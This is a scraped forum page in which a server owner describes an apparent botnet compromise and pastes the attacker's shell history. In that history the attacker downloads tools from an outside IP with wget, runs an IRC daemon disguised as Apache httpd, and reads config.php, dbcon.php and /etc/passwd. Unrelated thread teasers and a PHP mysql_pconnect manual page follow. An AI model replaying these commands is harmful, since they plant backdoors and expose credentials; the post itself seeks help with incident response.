@Corona.
If it means about full backup of each domain in /home, no I didnt make any backup. Disk space is limited and no additional disk. Last option maybey I should request OS restore to the hosting provider(?).
I was doing deep analyze of this attack for several days, and I guess my server has been turned to be one of botnet in the internet for several months or maybey in a year.
One thing that makes me confuse. I have locked the domain account that might be has been compromised, after doing the procedures above, how can the attacker create multiple processes and open port 6667,7000 with that locked account name and established connection to xxx.IRC.dal.net?
@Neo.
Thanks for your suggestion. I'll learn about that tripwire technique.
But, do you have any idea about how the attacker compromised my server?
# Additional information.
Here I give part of command history left by the attacker in last days.
Code:
pwd
history
cd /data/PEAR
ls -al
rm -rf bahamut-1.8.9
wget http://193.180.115.30/~online/tools/bahamut-1.8.9-release.tar.gz ;
tar -zxvf bahamut-1.8.9-release.tar.gz ;
rm -f bahamut-1.8.9-release.$
ls -al //ircd/template.conf
mkdir ircd
pwd
cd ..
mkdir ircd
cd ircd
cp /ircd/* .
ls -al
ls -al /ircd
rm -rf /ircd
ls -al
exit
cd /data/PEAR/ircd
save
hostname ; /sbin/ifconfig | grep inet
pwd
pico ircd.conf
ls -al
wget http://193.180.115.30/~online/tools/xh ; chmod +x xh ; ls -alF xh
ps aux
./xh -s "/usr/local/apache/bin/httpd -k start -DSSL" ./ircd
cd ..
pwd
id
exit
And here the another part of command.
Code:
cd $home
ls -al
cd public_html
ls -al
cat config.php
cat dbcon.php
cat /etc/passwd
wget http://193.180.115.30/~online/ftp ; ls -alF ftp*
perl ftp
rm -f ftp ftp.txt
exit
/* Linux Slackware */
looking in my logs I see tons of entries similar to below. Does anyone know what these mean, and should I be concerned. I looked up a few of the IP's at Arin.net and saw that many of them belong to isp's (not good).. Any information is helpful..
Body of Messages log... (1 Reply)
Hello!
I have a Linux nfs server (called server100 below) with a export nfs. My problem is that the Solaris client (called client100 below) doesn't seems to like it. In the Solaris syslog I got following messages (and after a while the solaris client behave liked its hanged/to buzy). Also see... (3 Replies)
Hi All,
I need your expertise in finding a way to solve my problem.Please excuse if this is not the right forum to ask this question and guide me to the correct forum,if possible.
I am a DBA and on a daily basis i have to ftp huge dump files from my company server to my laptop and then... (3 Replies)
Dear Friends,
Sorry for this basic request. But I just started learning Ksh recently and still I am a newbie in this field.
Q: I have files on one server and the date format is 20121001000009_224625.in which has year (yyyy) month (mm) and date (dd). I have these files on server A. The task... (8 Replies)
I need to connect to a ftp server-1 from linux server-2 and copy/get a file from server-1 which follows a name pattern of FILENAME* (located on the root directory) and copy on a directory on server-2. Later, I have to use this file for ETL loading... For this I tried using as below
/usr/bin/ftp... (8 Replies)
Hi ,
Is there any script to copy a files (weblogic bianary + silent.xml ) from one server (linux) to another servers and then execute the copy file.
We want to copy a file on multiple servers and run the installation.
Thanks (1 Reply)
I have 3 servers A, B, C and server B is having some files in /u01/soa/ directory, these files i want to copy to server C, and i want to run the script from server A.
Script(Server A) --> Files at Server B (Source server) --> Copy the files to Server C(Target Server).
We dont have RSA key... (4 Replies)
Hi,
I am trying to automate the process of fetching files from remote server to local server through sftp. I have the username and password for the remote solaris server. But I need to give password manually everytime i run the script.
Can anyone help me in automating the script such that it... (3 Replies)
Hi everyone,
I hope I am posting in the right spot and I really need some help. I am going through a horrible divorce and I am afraid that my husband has compromised . He set up my mac computer and router and for my job set up remote access for me. I caught him cheating on me and I think he... (6 Replies)
Discussion started by: kk243665
6 Replies
LEARN ABOUT PHP
mysql_pconnect
MYSQL_PCONNECT(3) 1 MYSQL_PCONNECT(3)mysql_pconnect - Open a persistent connection to a MySQL serverSYNOPSIS
Warning
This extension is deprecated as of PHP 5.5.0, and will be removed in the future. Instead, the MySQLi or PDO_MySQL extension should
be used. See also MySQL: choosing an API guide and related FAQ for more information. Alternatives to this function include:
omysqli_connect(3) with
p: host prefix
o PDO::__construct with PDO::ATTR_PERSISTENT as a driver option
resource mysql_pconnect ([string $server = ini_get("mysql.default_host")], [string $username = ini_get("mysql.default_user")], [string
$password = ini_get("mysql.default_password")], [int $client_flags])
DESCRIPTION
Establishes a persistent connection to a MySQL server.
mysql_pconnect(3) acts very much like mysql_connect(3) with two major differences.
First, when connecting, the function would first try to find a (persistent) link that's already open with the same host, username and
password. If one is found, an identifier for it will be returned instead of opening a new connection.
Second, the connection to the SQL server will not be closed when the execution of the script ends. Instead, the link will remain open for
future use (mysql_close(3) will not close links established by mysql_pconnect(3)).
This type of link is therefore called 'persistent'.
o $server
- The MySQL server. It can also include a port number. e.g. "hostname:port" or a path to a local socket e.g. ":/path/to/socket"
for the localhost. If the PHP directive mysql.default_host is undefined (default), then the default value is 'localhost:3306'
o $username
- The username. Default value is the name of the user that owns the server process.
o $password
- The password. Default value is an empty password.
o $client_flags
- The $client_flags parameter can be a combination of the following constants: 128 (enable LOAD DATA LOCAL handling),
MYSQL_CLIENT_SSL, MYSQL_CLIENT_COMPRESS, MYSQL_CLIENT_IGNORE_SPACE or MYSQL_CLIENT_INTERACTIVE.
Returns a MySQL persistent link identifier on success, or FALSE on failure.
+--------+---------------------------------------------------+
|Version | |
| | |
| | Description |
| | |
+--------+---------------------------------------------------+
| 5.5.0 | |
| | |
| | This function will generate an E_DEPRECATED |
| | error. |
| | |
+--------+---------------------------------------------------+
Note
Note, that these kind of links only work if you are using a module version of PHP. See the Persistent Database Connections section
for more information.
Warning
Using persistent connections can require a bit of tuning of your Apache and MySQL configurations to ensure that you do not exceed
the number of connections allowed by MySQL.
Note
You can suppress the error message on failure by prepending a @ to the function name.
mysql_connect(3), Persistent Database Connections.
PHP Documentation Group MYSQL_PCONNECT(3)
01-16-2013
Need deep technical explanations
